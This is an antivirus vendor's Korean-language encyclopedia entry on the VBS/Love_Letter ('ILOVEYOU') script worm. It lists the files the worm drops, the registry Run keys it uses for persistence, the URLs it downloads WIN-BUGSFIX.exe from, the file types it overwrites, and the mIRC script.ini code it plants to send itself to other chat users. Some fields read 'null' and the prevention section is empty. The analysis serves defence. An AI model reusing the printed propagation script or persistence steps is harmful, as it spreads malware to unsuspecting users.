이름

VBS/Love_Letter

바이러스 종류

Script Virus

실행환경

Windows

증상요약

null

위험등급

null

확산방법

null

치료방법

터보백신 제품군으로 치료 가능  

※ 상세 설명

메일 제목이 "ILOVEYOU" 인 이 바이러스가 실행되면 윈도우 폴더에 Win32DLL.vbs를 시스템 폴더에 LOVE-LETTER-FOR-YOU.TXT.vbs 와 MSKernel32.vbs 를 생성한다. 레지스트리에 아래와 같이 기록하여 부팅시 바이러스가 활동을 한다. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKer nel32 기록되는 값 : 시스템폴더\MSKernel32.vbs HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServic es\Win32DLL 기록되는 값 : 윈도우폴더\Win32DLL.vbs 시스템 폴더에 WinFAT32.exe 가 존재하지 않으면 아래의 사이트에서 WIN- BUGSFIX.exe 를 다운받아 아래의 레지스트리에 기록하여 부팅시 바이러스가 활동한다. http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw 6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe5 46786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmP OhfgER67b3Vbvg/WIN-BUGSFIX.exe http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhY UgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN- BUGSFIX.exe <레지스트리> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN- BUGSFIX 확장자가 vbs, vbe 인 경우에는 바이러스가 겹쳐써지며 js, jse, css, wsh, sct, hta 와 jpg, jpeg 의 경우 바이러스로 겹쳐써지고 확장자가 vbs 로 바뀐다 그리고 확장자가 mp2, mp3 인 파일들은 숨김속성으로 바꾸고 같은 이름에 vbs 확장자가 추가된 바이러스 파일을 생성한다. ex) abcd.mp3 -> abcd.mp3.vbs(abcd.mp3는 숨김속성으로 되어있음) 감염시 mirc 폴더의 script.ini 를 아래와 같이 바꾸어 mirc 를 사용하여 채팅을 할 때 상대방에게 LOVE-LETTER-FOR-YOU.TXT.vbs 파일을 보낸다. [script] ;mIRC Script ; Please dont edit this script... mIRC will corrupt, if mIRC will corrupt... WINDOWS will affect and will not run correctly. thanks ; ;Khaled Mardam-Bey ;http://www.mirc.com ; n0=on 1:JOIN:#:{ n1= /if ( $nick == $me ) { halt } n2= /.dcc send $nick 시스템폴더\LOVE-LETTER-FOR-YOU.HTM n3=} 아웃룩에 있는 주소록에 있는 사용자들에게 아래의 내용으로 메일을 보낸 다.

※ 예방 및 수동 조치 방법

• 본 컨텐츠에 대한 저작권은 '에브리존'에게 있으며 이에 무단 사용 및 재배포를 금지합니다.
• 본 컨텐츠에 대한 이용 문의는 '에브리존'으로 문의하여 주십시요